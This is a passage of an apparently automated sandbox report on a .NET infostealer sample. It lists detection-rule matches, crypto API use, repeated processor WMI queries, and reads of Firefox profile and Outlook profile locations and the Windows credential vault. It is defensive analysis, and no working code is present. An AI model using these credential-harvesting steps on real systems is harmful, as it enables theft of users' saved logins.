                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_067357580_2_06735758
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeCode function: 0_2_06733DA70_2_06733DA7
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4106900686.000000000159E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000000.1661435807.0000000001020000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename93206442-328e-4793-9eb2-22117442bc41.exe4 vs 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4106713875.00000000011B8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeBinary or memory string: OriginalFilename93206442-328e-4793-9eb2-22117442bc41.exe4 vs 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeBinary string: ID: 0x{0:X}qSize of the SerializedPropertyStore is less than 8 ({0})/StoreSize: {0} (0x{0X})3\Device\LanmanRedirector\[Failed to retrieve system handle information.H%o
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeMutant created: NULL
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
